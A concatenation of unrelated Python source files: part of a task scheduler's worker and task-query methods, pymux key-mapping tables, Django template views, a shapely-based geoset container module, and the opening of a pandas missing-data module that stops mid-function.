filter_func = lambda _: True
else:
terms = search.split()
filter_func = lambda t: all(term in t.id for term in terms)
for task in filter(filter_func, self._state.get_active_tasks(status)):
if (task.status != PENDING or not upstream_status or
upstream_status == self._upstream_status(task.id, upstream_status_table)):
serialized = self._serialize_task(task.id, False)
result[task.id] = serialized
if limit and len(result) > self._config.max_shown_tasks:
return {'num_tasks': len(result)}
return result
def worker_list(self, include_running=True, **kwargs):
self.prune()
workers = [
dict(
name=worker.id,
last_active=worker.last_active,
started=getattr(worker, 'started', None),
**worker.info
) for worker in self._state.get_active_workers()]
workers.sort(key=lambda worker: worker['started'], reverse=True)
if include_running:
running = collections.defaultdict(dict)
num_pending = collections.defaultdict(int)
num_uniques = collections.defaultdict(int)
for task in self._state.get_pending_tasks():
if task.status == RUNNING and task.worker_running:
running[task.worker_running][task.id] = self._serialize_task(task.id, False)
elif task.status == PENDING:
for worker in task.workers:
num_pending[worker] += 1
if len(task.workers) == 1:
num_uniques[list(task.workers)[0]] += 1
for worker in workers:
tasks = running[worker['name']]
worker['num_running'] = len(tasks)
worker['num_pending'] = num_pending[worker['name']]
worker['num_uniques'] = num_uniques[worker['name']]
worker['running'] = tasks
return workers
def inverse_dep_graph(self, task_id, **kwargs):
self.prune()
serialized = {}
if self._state.has_task(task_id):
self._traverse_inverse_deps(task_id, serialized)
return serialized
def _traverse_inverse_deps(self, task_id, serialized):
stack = [task_id]
serialized[task_id] = self._serialize_task(task_id)
while len(stack) > 0:
curr_id = stack.pop()
for task in self._state.get_active_tasks():
if curr_id in task.deps:
serialized[curr_id]["deps"].append(task.id)
if task.id not in serialized:
serialized[task.id] = self._serialize_task(task.id)
serialized[task.id]["deps"] = []
stack.append(task.id)
def task_search(self, task_str, **kwargs):
"""
Query for a subset of tasks by task_id.
:param task_str: substring to match against task ids
:return: dict mapping each matching task's status to {task_id: serialized task}
"""
self.prune()
result = collections.defaultdict(dict)
for task in self._state.get_active_tasks():
if task.id.find(task_str) != -1:
serialized = self._serialize_task(task.id, False)
result[task.status][task.id] = serialized
return result
def re_enable_task(self, task_id):
serialized = {}
task = self._state.get_task(task_id)
if task and task.status == DISABLED and task.scheduler_disable_time:
self._state.re_enable(task, self._config)
serialized = self._serialize_task(task_id)
return serialized
def fetch_error(self, task_id, **kwargs):
if self._state.has_task(task_id):
return {"taskId": task_id, "error": self._state.get_task(task_id).expl}
else:
return {"taskId": task_id, "error": ""}
def _update_task_history(self, task, status, host=None):
try:
if status == DONE or status == FAILED:
successful = (status == DONE)
self._task_history.task_finished(task, successful)
elif status == PENDING:
self._task_history.task_scheduled(task)
elif status == RUNNING:
self._task_history.task_started(task, host)
except BaseException:
logger.warning("Error saving Task history", exc_info=True)
@property
def task_history(self):
# Used by server.py to expose the calls
return self._task_history
|
|
"""
Mapping between vt100 key sequences, the prompt_toolkit key constants and the
Pymux namings. (Those namings are kept compatible with tmux.)
"""
from __future__ import unicode_literals
from prompt_toolkit.keys import Keys
from prompt_toolkit.input.vt100_parser import ANSI_SEQUENCES
__all__ = (
'pymux_key_to_prompt_toolkit_key_sequence',
'prompt_toolkit_key_to_vt100_key',
'PYMUX_TO_PROMPT_TOOLKIT_KEYS',
)
def pymux_key_to_prompt_toolkit_key_sequence(key):
"""
Turn a pymux description of a key (e.g. "C-a" or "M-x") into a
prompt-toolkit key sequence.
Raises `ValueError` if the key is not known.
"""
# Make the c- and m- prefixes case insensitive.
if key.lower().startswith('m-c-'):
key = 'M-C-' + key[4:]
elif key.lower().startswith('c-'):
key = 'C-' + key[2:]
elif key.lower().startswith('m-'):
key = 'M-' + key[2:]
# Lookup key.
try:
return PYMUX_TO_PROMPT_TOOLKIT_KEYS[key]
except KeyError:
if len(key) == 1:
return (key, )
else:
raise ValueError('Unknown key: %r' % (key, ))
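# Illustrative usage (values come from PYMUX_TO_PROMPT_TOOLKIT_KEYS below):
#   pymux_key_to_prompt_toolkit_key_sequence('C-b')  -> (Keys.ControlB, )
#   pymux_key_to_prompt_toolkit_key_sequence('M-x')  -> (Keys.Escape, 'x')
#   pymux_key_to_prompt_toolkit_key_sequence('x')    -> ('x', )  # fallback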
# Create a mapping from prompt_toolkit keys to their ANSI sequences.
# TODO: This is not completely correct yet. It doesn't take
# cursor/application mode into account. Create new tables for this.
_PROMPT_TOOLKIT_KEY_TO_VT100 = dict(
(key, vt100_data) for vt100_data, key in ANSI_SEQUENCES.items())
def prompt_toolkit_key_to_vt100_key(key, application_mode=False):
"""
Turn a prompt toolkit key (e.g. Keys.ControlB) into a VT100 key
sequence (e.g. '\\x1b[A').
"""
application_mode_keys = {
Keys.Up: '\x1bOA',
Keys.Left: '\x1bOD',
Keys.Right: '\x1bOC',
Keys.Down: '\x1bOB',
}
if application_mode and key in application_mode_keys:
return application_mode_keys.get(key)
else:
return _PROMPT_TOOLKIT_KEY_TO_VT100.get(key, key)
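# Illustrative: in application/cursor-keys mode the arrow keys use SS3
# ('\x1bO...') sequences instead of the usual CSI ('\x1b[...') ones:
#   prompt_toolkit_key_to_vt100_key(Keys.Up, application_mode=True)  # '\x1bOA'
#   prompt_toolkit_key_to_vt100_key(Keys.Up)  # CSI form taken from
#                                             # ANSI_SEQUENCES, typically '\x1b[A'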
PYMUX_TO_PROMPT_TOOLKIT_KEYS = {
'Space': (' ', ),
'C-a': (Keys.ControlA, ),
'C-b': (Keys.ControlB, ),
'C-c': (Keys.ControlC, ),
'C-d': (Keys.ControlD, ),
'C-e': (Keys.ControlE, ),
'C-f': (Keys.ControlF, ),
'C-g': (Keys.ControlG, ),
'C-h': (Keys.ControlH, ),
'C-i': (Keys.ControlI, ),
'C-j': (Keys.ControlJ, ),
'C-k': (Keys.ControlK, ),
'C-l': (Keys.ControlL, ),
'C-m': (Keys.ControlM, ),
'C-n': (Keys.ControlN, ),
'C-o': (Keys.ControlO, ),
'C-p': (Keys.ControlP, ),
'C-q': (Keys.ControlQ, ),
'C-r': (Keys.ControlR, ),
'C-s': (Keys.ControlS, ),
'C-t': (Keys.ControlT, ),
'C-u': (Keys.ControlU, ),
'C-v': (Keys.ControlV, ),
'C-w': (Keys.ControlW, ),
'C-x': (Keys.ControlX, ),
'C-y': (Keys.ControlY, ),
'C-z': (Keys.ControlZ, ),
'C-Left': (Keys.ControlLeft, ),
'C-Right': (Keys.ControlRight, ),
'C-Up': (Keys.ControlUp, ),
'C-Down': (Keys.ControlDown, ),
'C-\\': (Keys.ControlBackslash, ),
'S-Left': (Keys.ShiftLeft, ),
'S-Right': (Keys.ShiftRight, ),
'S-Up': (Keys.ShiftUp, ),
'S-Down': (Keys.ShiftDown, ),
'M-C-a': (Keys.Escape, Keys.ControlA, ),
'M-C-b': (Keys.Escape, Keys.ControlB, ),
'M-C-c': (Keys.Escape, Keys.ControlC, ),
'M-C-d': (Keys.Escape, Keys.ControlD, ),
'M-C-e': (Keys.Escape, Keys.ControlE, ),
'M-C-f': (Keys.Escape, Keys.ControlF, ),
'M-C-g': (Keys.Escape, Keys.ControlG, ),
'M-C-h': (Keys.Escape, Keys.ControlH, ),
'M-C-i': (Keys.Escape, Keys.ControlI, ),
'M-C-j': (Keys.Escape, Keys.ControlJ, ),
'M-C-k': (Keys.Escape, Keys.ControlK, ),
'M-C-l': (Keys.Escape, Keys.ControlL, ),
'M-C-m': (Keys.Escape, Keys.ControlM, ),
'M-C-n': (Keys.Escape, Keys.ControlN, ),
'M-C-o': (Keys.Escape, Keys.ControlO, ),
'M-C-p': (Keys.Escape, Keys.ControlP, ),
'M-C-q': (Keys.Escape, Keys.ControlQ, ),
'M-C-r': (Keys.Escape, Keys.ControlR, ),
'M-C-s': (Keys.Escape, Keys.ControlS, ),
'M-C-t': (Keys.Escape, Keys.ControlT, ),
'M-C-u': (Keys.Escape, Keys.ControlU, ),
'M-C-v': (Keys.Escape, Keys.ControlV, ),
'M-C-w': (Keys.Escape, Keys.ControlW, ),
'M-C-x': (Keys.Escape, Keys.ControlX, ),
'M-C-y': (Keys.Escape, Keys.ControlY, ),
'M-C-z': (Keys.Escape, Keys.ControlZ, ),
'M-C-Left': (Keys.Escape, Keys.ControlLeft, ),
'M-C-Right': (Keys.Escape, Keys.ControlRight, ),
'M-C-Up': (Keys.Escape, Keys.ControlUp, ),
'M-C-Down': (Keys.Escape, Keys.ControlDown, ),
'M-C-\\': (Keys.Escape, Keys.ControlBackslash, ),
'M-a': (Keys.Escape, 'a'),
'M-b': (Keys.Escape, 'b'),
'M-c': (Keys.Escape, 'c'),
'M-d': (Keys.Escape, 'd'),
'M-e': (Keys.Escape, 'e'),
'M-f': (Keys.Escape, 'f'),
'M-g': (Keys.Escape, 'g'),
'M-h': (Keys.Escape, 'h'),
'M-i': (Keys.Escape, 'i'),
'M-j': (Keys.Escape, 'j'),
'M-k': (Keys.Escape, 'k'),
'M-l': (Keys.Escape, 'l'),
'M-m': (Keys.Escape, 'm'),
'M-n': (Keys.Escape, 'n'),
'M-o': (Keys.Escape, 'o'),
'M-p': (Keys.Escape, 'p'),
'M-q': (Keys.Escape, 'q'),
'M-r': (Keys.Escape, 'r'),
'M-s': (Keys.Escape, 's'),
'M-t': (Keys.Escape, 't'),
'M-u': (Keys.Escape, 'u'),
'M-v': (Keys.Escape, 'v'),
'M-w': (Keys.Escape, 'w'),
'M-x': (Keys.Escape, 'x'),
'M-y': (Keys.Escape, 'y'),
'M-z': (Keys.Escape, 'z'),
'M-0': (Keys.Escape, '0'),
'M-1': (Keys.Escape, '1'),
'M-2': (Keys.Escape, '2'),
'M-3': (Keys.Escape, '3'),
'M-4': (Keys.Escape, '4'),
'M-5': (Keys.Escape, '5'),
'M-6': (Keys.Escape, '6'),
'M-7': (Keys.Escape, '7'),
'M-8': (Keys.Escape, '8'),
'M-9': (Keys.Escape, '9'),
'M-Up': (Keys.Escape, Keys.Up),
'M-Down': (Keys.Escape, Keys.Down, ),
'M-Left': (Keys.Escape, Keys.Left, ),
'M-Right': (Keys.Escape, Keys.Right, ),
'Left': (Keys.Left, ),
'Right': (Keys.Right, ),
'Up': (Keys.Up, ),
'Down': (Keys.Down, ),
'BSpace': (Keys.Backspace, ),
'BTab': (Keys.BackTab, ),
'DC': (Keys.Delete, ),
'IC': (Keys.Insert, ),
'End': (Keys.End, ),
'Enter': (Keys.ControlJ, ),
'Home': (Keys.Home, ),
'Escape': (Keys.Escape, ),
'Tab': (Keys.Tab, ),
'F1': (Keys.F1, ),
'F2': (Keys.F2, ),
'F3': (Keys.F3, ),
'F4': (Keys.F4, ),
'F5': (Keys.F5, ),
'F6': (Keys.F6, ),
'F7': (Keys.F7, ),
'F8': (Keys.F8, ),
'F9': (Keys.F9, ),
'F10': (Keys.F10, ),
'F11': (Keys.F11, ),
'F12': (Keys.F12, ),
'F13': (Keys.F13, ),
'F14': (Keys.F14, ),
'F15': (Keys.F15, ),
'F16': (Keys.F16, ),
'F17': (Keys.F17, ),
'F18': (Keys.F18, ),
'F19': (Keys.F19, ),
'F20': (Keys.F20, ),
'NPage': (Keys.PageDown, ),
'PageDown': (Keys.PageDown, ),
'PgDn': (Keys.PageDown, ),
'PPage': (Keys.PageUp, ),
'PageUp': (Keys.PageUp, ),
'PgUp': (Keys.PageUp, ),
}
|
|
from django.shortcuts import render
# Create your views here.
def proindex(request):
    return render(request, 'example/probase.html')
def index(request):
    return render(request, 'e_index.html')
def badges_labels(request):
    return render(request, 'badges_labels.html')
def four(request):
    return render(request, '404.html')
def five(request):
    return render(request, '500.html')
def basic_gallery(request):
    return render(request, 'basic_gallery.html')
def buttons(request):
    return render(request, 'buttons.html')
def calendar(request):
    return render(request, 'calendar.html')
def carousel(request):
    return render(request, 'carousel.html')
def chat_view(request):
    return render(request, 'chat_view.html')
def code_editor(request):
    return render(request, 'code_editor.html')
def contacts(request):
    return render(request, 'contacts.html')
def css_animation(request):
    return render(request, 'css_animation.html')
def draggable_panels(request):
    return render(request, 'draggable_panels.html')
def empty_page(request):
    return render(request, 'empty_page.html')
def faq(request):
    return render(request, 'faq.html')
def file_manager(request):
    return render(request, 'file_manager.html')
def form_advanced(request):
    return render(request, 'form_advanced.html')
def form_avatar(request):
    return render(request, 'form_avatar.html')
def form_basic(request):
    return render(request, 'form_basic.html')
def form_builder(request):
    return render(request, 'form_builder.html')
def form_editors(request):
    return render(request, 'form_editors.html')
def form_file_upload(request):
    return render(request, 'form_file_upload.html')
def form_markdown(request):
    return render(request, 'form_markdown.html')
def form_simditor(request):
    return render(request, 'form_simditor.html')
def form_validate(request):
    return render(request, 'form_validate.html')
def form_webuploader(request):
    return render(request, 'form_webuploader.html')
def form_wizard(request):
    return render(request, 'form_wizard.html')
def forum_main(request):
    return render(request, 'forum_main.html')
def graph_echarts(request):
    return render(request, 'graph_echarts.html')
def graph_flot(request):
    return render(request, 'graph_flot.html')
def graph_morris(request):
    return render(request, 'graph_morris.html')
def graph_peity(request):
    return render(request, 'graph_peity.html')
def graph_rickshaw(request):
    return render(request, 'graph_rickshaw.html')
def graph_sparkline(request):
    return render(request, 'graph_sparkline.html')
def grid_options(request):
    return render(request, 'grid_options.html')
def iconfont(request):
    return render(request, 'iconfont.html')
def icons(request):
    return render(request, 'icons.html')
def index_1(request):
    return render(request, 'index_1.html')
def index_2(request):
    return render(request, 'index_2.html')
def index_3(request):
    return render(request, 'index_3.html')
def index_4(request):
    return render(request, 'index_4.html')
def invoice(request):
    return render(request, 'invoice.html')
def invoice_print(request):
    return render(request, 'invoice_print.html')
def layer(request):
    return render(request, 'layer.html')
def layerdate(request):
    return render(request, 'layerdate.html')
def layouts(request):
    return render(request, 'layouts.html')
def lockscreen(request):
    return render(request, 'lockscreen.html')
def login(request):
    return render(request, 'login.html')
def mailbox(request):
    return render(request, 'mailbox.html')
def mail_compose(request):
    return render(request, 'mail_compose.html')
def mail_detail(request):
    return render(request, 'mail_detail.html')
def modal_window(request):
    return render(request, 'modal_window.html')
def nestable_list(request):
    return render(request, 'nestable_list.html')
def notifications(request):
    return render(request, 'notifications.html')
def pin_board(request):
    return render(request, 'pin_board.html')
def profile(request):
    return render(request, 'profile.html')
def projects(request):
    return render(request, 'projects.html')
def project_detail(request):
    return render(request, 'project_detail.html')
def register(request):
    return render(request, 'register.html')
def search_results(request):
    return render(request, 'search_results.html')
def table_basic(request):
    return render(request, 'table_basic.html')
def table_data_tables(request):
    return render(request, 'table_data_tables.html')
def table_jqgrid(request):
    return render(request, 'table_jqgrid.html')
def tabs_panels(request):
    return render(request, 'tabs_panels.html')
def timeline(request):
    return render(request, 'timeline.html')
def timeline_v2(request):
    return render(request, 'timeline_v2.html')
def toastr_notifications(request):
    return render(request, 'toastr_notifications.html')
def tree_view(request):
    return render(request, 'tree_view.html')
def tree_view_v2(request):
    return render(request, 'tree_view_v2.html')
def typography(request):
    return render(request, 'typography.html')
def validation(request):
    return render(request, 'validation.html')
def webim(request):
    return render(request, 'webim.html')
def widgets(request):
    return render(request, 'widgets.html')
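# Minimal URLconf sketch for wiring a few of these views (illustrative;
# the app label and import path are assumptions):
#
#     from django.conf.urls import url
#     from example import views
#
#     urlpatterns = [
#         url(r'^$', views.index, name='index'),
#         url(r'^login/$', views.login, name='login'),
#         url(r'^widgets/$', views.widgets, name='widgets'),
#     ]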
|
|
"""
=================
`geoutil._geoset`
=================
Container classes for organizing collections of `shapely.geometry` objects.
This module defines a custom data structure called a *geoset* that enables
basic grouping and attribution of objects from `shapely.geometry`. The
geoset structure is implemented using nested classes: `Geo` instances are
stored in `Item` instances, and `Item` instances are stored in a `Geoset`
instance. See the `Geoset` class for a full description of the geoset
model.
Classes
-------
======== ==========================================
`Geo` Container for a single geometry object.
`Item` Container for a group of `Geo` instances.
`Geoset` Container for a group of `Item` instances.
======== ==========================================
"""
from collections import OrderedDict
from shapely import geometry
from . import _utils
class Geo(object):
"""Container for a single geometry object.
Store a geometry class instance from `shapely.geometry` and a set of
attributes. This class represents the smallest unit in the geoset
specification (see the `Geoset` class for an overview).
Parameters
----------
geo : class from `shapely.geometry` or None
Initializes the `geo` instance variable.
attrs : optional
Initializes the `attrs` instance variable. Default value is None.
Attributes
----------
geo : class from `shapely.geometry` or None
Any class instance from `shapely.geometry`, e.g., `Polygon`. May also
be None.
attrs : dict-like or None
Attributes as key-value pairs (typically an `OrderedDict`). None if
no attributes.
Methods
-------
pix2world
world2pix
translate
copy
"""
def __init__(self, geo, attrs=None):
self.geo = geo
self.attrs = attrs
def __str__(self, i=None, n=None, indent=' ', level=0):
"""
Parameters
----------
i : int
geo number.
n : int
Number of geos encountered before the parent item.
indent : str
Set the indent for geo lines.
level : int
Set the indent level for geos.
"""
geostr = 'None' if self.geo is None else self.geo.type
if self.attrs is None:
attrstr = ''
else:
attrstr = ', {0:d} attr(s)'.format(len(self.attrs))
if i is not None and n is not None:
istr = ' {0:d},{1:d}: '.format(i, i+n)
elif i is not None:
istr = ' {0:d}: '.format(i)
else:
istr = ': '
return level*indent + 'Geo' + istr + geostr + attrstr
def pix2world(self, hdr):
"""Return a copy with coordinates converted to the WCS world
system.
Any attributes describing the coordinate system of the item must be
updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header`
Transform coordinates according to the WCS information in the
FITS header.
Returns
-------
out : `Geo`
Copy of the original with coordinates converted to the WCS
world system.
"""
if self.geo is None:
geo = None
else:
geo = _utils.poly_pix2world([self.geo], hdr)[0]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Geo(geo, attrs=attrs)
def world2pix(self, hdr):
"""Return a copy with coordinates converted to the pixel system.
Any attributes describing the coordinate system of the item must be
updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header`
Transform coordinates according to the WCS information in the
FITS header.
Returns
-------
out : `Geo`
Copy of the original with coordinates converted to the pixel
system.
"""
if self.geo is None:
geo = None
else:
geo = _utils.poly_world2pix([self.geo], hdr)[0]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Geo(geo, attrs=attrs)
def translate(self, dx, dy):
"""Return a copy with coordinates translated by `dx` and `dy`.
Parameters
----------
dx, dy : int or float
Coordinate shifts in the x and y directions.
Returns
-------
out : `Geo`
Copy of the original with coordinates translated by `dx` and
`dy`.
"""
if self.geo is None:
geo = None
else:
geo = _utils.poly_translate([self.geo], dx, dy)[0]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Geo(geo, attrs=attrs)
def copy(self):
"""Return a deep copy.
Returns
-------
out : `Geo`
Deep copy of the original.
Notes
-----
The geometry object is copied by computing its union with a null
geometry. As a result, the coordinates of this copy may be
reordered from the original and string representations would not be
equal. The `attrs` instance variable is copied as an `OrderedDict`
(unless it is None).
"""
if self.geo is None:
geo = None
else:
geo = self.geo.union(geometry.Point())
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Geo(geo, attrs=attrs)
class Item(object):
"""Container for a group of `Geo` instances.
Store any number of `Geo` class instances and a set of attributes. This
class represents the intermediate unit in the geoset specification (see
the `Geoset` class for an overview).
Parameters
----------
geos : list, tuple, `Geo`, or None
Initialize the `geos` instance variable using either a list or
tuple of zero or more `Geo` instances, a single `Geo` instance
(will automatically be turned into a list of length 1), or None.
attrs : optional
Initialize the `attrs` instance variable. Default value is None.
Attributes
----------
geos : list
List of zero or more `Geo` instances.
attrs : dict-like or None
Attributes as key-value pairs (typically an `OrderedDict`). None if
no attributes.
Methods
-------
pix2world
world2pix
translate
copy
"""
def __init__(self, geos, attrs=None):
if not geos:
geos = []
elif not getattr(geos, '__iter__', False):
geos = [geos]
self.geos = geos
self.attrs = attrs
def __str__(self, i=None, n=None, indent=' ', level=0):
"""
Parameters
----------
i : int
Item number.
n : int
Number of geos encountered before this item.
indent : str
Set the indent for item lines.
level : int
Set the indent level for items.
"""
if not self.geos:
geosstr = 'None'
else:
geosstr = '{0:d} geo(s)'.format(len(self.geos))
if self.attrs is None:
attrstr = ''
else:
attrstr = ', {0:d} attr(s)'.format(len(self.attrs))
istr = ': ' if i is None else ' {0:d}: '.format(i)
lines = [level*indent + 'Item' + istr + geosstr + attrstr]
for j, geo in enumerate(self.geos):
lines.append(geo.__str__(i=j+1, n=n, level=level+1))
return '\n'.join(lines)
def pix2world(self, hdr):
"""Return a copy with coordinates converted to the WCS world
system.
Any attributes describing the coordinate system of the item must be
updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header`
Transform coordinates according to the WCS information in the
FITS header.
Returns
-------
out : `Item`
Copy of the original with coordinates converted to the WCS
world system.
"""
geos = [geo.pix2world(hdr) for geo in self.geos]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Item(geos, attrs=attrs)
def world2pix(self, hdr):
"""Return a copy with coordinates converted to the pixel system.
Any attributes describing the coordinate system of the item must be
updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header`
Transform coordinates according to the WCS information in the
FITS header.
Returns
-------
out : `Item`
Copy of the original with coordinates converted to the pixel
system.
"""
geos = [geo.world2pix(hdr) for geo in self.geos]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Item(geos, attrs=attrs)
def translate(self, dx, dy):
"""Return a copy with coordinates translated by `dx` and `dy`.
Parameters
----------
dx, dy : int or float
Coordinate shifts in the x and y directions.
Returns
-------
out : `Item`
Copy of the original with coordinates translated by `dx` and
`dy`.
"""
geos = [geo.translate(dx, dy) for geo in self.geos]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Item(geos, attrs=attrs)
def copy(self):
"""Return a deep copy.
Returns
-------
out : `Item`
Deep copy of the original.
Notes
-----
Each geometry object is copied by computing its union with a null
geometry. As a result, the coordinates of a copy may be reordered
from the original and string representations would not be equal.
Each `attrs` instance variable is copied as an `OrderedDict`
(unless it is None).
"""
geos = [geo.copy() for geo in self.geos]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
return Item(geos, attrs=attrs)
class Geoset(object):
"""Container for a group of `Item` instances.
This class defines a custom data structure called a geoset that enables
basic grouping and attribution of objects from `shapely.geometry` (e.g.
`Polygons`).
Parameters
----------
items : list, tuple, `Item`, or None
Initialize the `items` instance variable using either a list or
tuple of zero or more `Item` instances, a single `Item` instance,
or None.
attrs : optional
Initialize the `attrs` instance variable. Default value is None.
hdr : optional
Initialize the `hdr` instance variable. Default value is None.
Attributes
----------
items : list
List of zero or more `Item` instances.
geos
attrs : dict-like or None
Attributes as key-value pairs (typically an `OrderedDict`). None if
no attributes.
hdr : `astropy.io.fits.header.Header` or None
FITS header that relates to the stored geometries, e.g. WCS
information for transforming between pixel and sky coordinates.
None if no header.
Methods
-------
pix2world
world2pix
translate
copy
Notes
-----
The geoset structure is a simple tree-like hierarchy of nested classes,
and is implemented as follows:
=========== ======== ====== ======
level 1 2 3
=========== ======== ====== ======
class `Geoset` `Item` `Geo`
container .items .geos .geo
attributes .attrs .attrs .attrs
FITS header .hdr
=========== ======== ====== ======
A single geometry object is contained with its specific attributes in a
`Geo` instance. Multiple (possibly related) `Geo` instances are grouped
together in an `Item` instance, along with a set of attributes specific
to the group. The `Geoset` class contains a set of `Item` instances.
The geoset as a whole may carry a set of attributes, as well as a FITS
header (an `astropy.io.fits.Header` instance; particularly useful if
the geometries are all specified in pixel coordinates). All attribute
sets are dict-like, typically `OrderedDict` instances. See the `Item`
and `Geo` classes for further details.
There is some flexibility in how geometry objects are assigned to an
item. Any number of `Geo` instances are allowed within an `Item`, while
the `shapely.geometry` subpackage supports various "multi" geometry
objects and collections, such as `MultiPolygon`. It is therefore
possible for an item to have several `Geo` instances, each with a
different geometry type, including collections, `MultiPolygons`, etc.
A typical use is storing polygons of regions identified in an image.
The FITS image header and any "global" attributes of the region set
could be stored in a `Geoset`, along with a list of `Item` instances,
where an "item" in this case could mean an individual region. Each
`Item` might contain some attributes describing the specific region
(name, etc.), and then a list of `Geo` instances, each of which
contains a polygon object (and even more attributes, if needed). The
number of `Geo` instances assigned to each item/region depends on the
complexity of the region; simple regions described by a single polygon
would only require one `Geo` instance.
Examples
--------
To build a geoset from scratch given a single geometry object (e.g. a
`shapely.geometry.Polygon` instance, ``poly``),
>>> geo = Geo(poly)
>>> item = Item(geo)
>>> geoset = Geoset(item)
>>> print(geoset)
Geoset: 1 item(s), 1 geo(s)
Item 1: 1 geo(s)
Geo 1,1: Polygon
To add on to an existing geoset (e.g. a second polygon, ``poly2``),
>>> geoset.items[0].geos.append(Geo(poly2))
>>> print(geoset)
Geoset: 1 item(s), 2 geo(s)
Item 1: 2 geo(s)
Geo 1,1: Polygon
Geo 2,2: Polygon
"""
def __init__(self, items=None, attrs=None, hdr=None):
if items is None:
items = []
elif not getattr(items, '__iter__', False):
items = [items]
self.items = items
self.attrs = attrs
self.hdr = hdr
self._geos = None
def __str__(self):
if not self.items:
itemsstr = ': None'
else:
itemsstr = ': {0:d} item(s)'.format(len(self.items))
ngeos = sum([len(item.geos) for item in self.items])
geosstr = ', {0:d} geo(s)'.format(ngeos)
if self.attrs is None:
attrstr = ''
else:
attrstr = ', {0:d} attr(s)'.format(len(self.attrs))
hdrstr = '' if self.hdr is None else ', FITS header'
lines = ['Geoset' + itemsstr + geosstr + attrstr + hdrstr]
n = 0
for j, item in enumerate(self.items):
lines.append(item.__str__(i=j+1, n=n, level=1))
n += len(item.geos)
return '\n'.join(lines)
def pix2world(self, hdr=None):
"""Return a copy with coordinates converted to the WCS world
system.
Any attributes describing the coordinate system of the geoset must
be updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header` or None, optional
Transform coordinates according to the WCS information in the
FITS header. If None, the header stored in the geoset is used.
Default value is None.
Returns
-------
out : `Geoset`
Copy of the original with coordinates converted to the WCS
world system.
"""
if hdr is None:
hdr = self.hdr
items = [item.pix2world(hdr) for item in self.items]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
if self.hdr is None:
hdr = None
else:
hdr = self.hdr.copy()
return Geoset(items, attrs=attrs, hdr=hdr)
def world2pix(self, hdr=None):
"""Return a copy with coordinates converted to the pixel system.
Any attributes describing the coordinate system of the geoset must
be updated manually!
Parameters
----------
hdr : `astropy.io.fits.Header` or None, optional
Transform coordinates according to the WCS information in the
FITS header. If None, the header stored in the geoset is used.
Default value is None.
Returns
-------
out : `Geoset`
Copy of the original with coordinates converted to the pixel
system.
"""
if hdr is None:
hdr = self.hdr
items = [item.world2pix(hdr) for item in self.items]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
if self.hdr is None:
hdr = None
else:
hdr = self.hdr.copy()
return Geoset(items, attrs=attrs, hdr=hdr)
def translate(self, dx, dy):
"""Return a copy with coordinates translated by dx and dy.
Parameters
----------
dx, dy : int or float
Coordinate shifts in the x and y directions.
Returns
-------
out : `Geoset`
Copy of the original with coordinates translated by `dx` and
`dy`.
"""
items = [item.translate(dx, dy) for item in self.items]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
if self.hdr is None:
hdr = None
else:
hdr = self.hdr.copy()
return Geoset(items, attrs=attrs, hdr=hdr)
def copy(self):
"""Return a deep copy.
Returns
-------
out : `Geoset`
Deep copy of the original.
Notes
-----
Each geometry object in the tree is copied by computing its union
with a null geometry. As a result, the coordinates of a copy may be
reordered from the original and string representations would not be
equal. Each `attrs` instance variable in the tree is copied as an
`OrderedDict` (unless it is None).
"""
items = [item.copy() for item in self.items]
if self.attrs is None:
attrs = None
else:
attrs = OrderedDict((key, val) for key, val in self.attrs.items())
if self.hdr is None:
hdr = None
else:
hdr = self.hdr.copy()
return Geoset(items, attrs=attrs, hdr=hdr)
@property
def geos(self):
"""Return a complete listing of `Geo` instances in the tree.
This is a read-only attribute; setting and deleting members in this
list are not supported.
Returns
-------
out : list
A list of all `Geo` instances stored in the tree.
"""
self._geos = []
for item in self.items:
for geo in item.geos:
self._geos.append(geo)
return self._geos
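# Minimal usage sketch (illustrative, not part of the module API). Assumes
# shapely is installed and that `_utils.poly_translate` shifts coordinates
# by (dx, dy), as its use in `translate` above suggests.
if __name__ == '__main__':
    from shapely.geometry import Polygon
    triangle = Polygon([(0, 0), (1, 0), (1, 1)])
    gs = Geoset(Item(Geo(triangle, attrs=OrderedDict(name='region 1'))))
    print(gs)
    # `translate` returns a copy; the original geoset is unchanged.
    print(gs.translate(10, 10).geos[0].geo.bounds)  # (10.0, 10.0, 11.0, 11.0)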
|
|
"""
Routines for filling missing data.
"""
import numpy as np
from pandas._libs import algos, lib
from pandas.compat._optional import import_optional_dependency
from pandas.core.dtypes.cast import infer_dtype_from_array
from pandas.core.dtypes.common import (
ensure_float64,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_integer,
is_integer_dtype,
is_numeric_v_string_like,
is_scalar,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import isna
def mask_missing(arr, values_to_mask):
"""
Return a masking array of the same size/shape as arr, with entries set
to True wherever arr equals any member of values_to_mask.
"""
dtype, values_to_mask = infer_dtype_from_array(values_to_mask)
try:
values_to_mask = np.array(values_to_mask, dtype=dtype)
except Exception:
values_to_mask = np.array(values_to_mask, dtype=object)
na_mask = isna(values_to_mask)
nonna = values_to_mask[~na_mask]
mask = None
for x in nonna:
if mask is None:
# numpy elementwise comparison warning
if is_numeric_v_string_like(arr, x):
mask = False
else:
mask = arr == x
# if x is a string and arr is not, then we get False and we must
# expand the mask to size arr.shape
if is_scalar(mask):
mask = np.zeros(arr.shape, dtype=bool)
else:
# numpy elementwise comparison warning
if is_numeric_v_string_like(arr, x):
mask |= False
else:
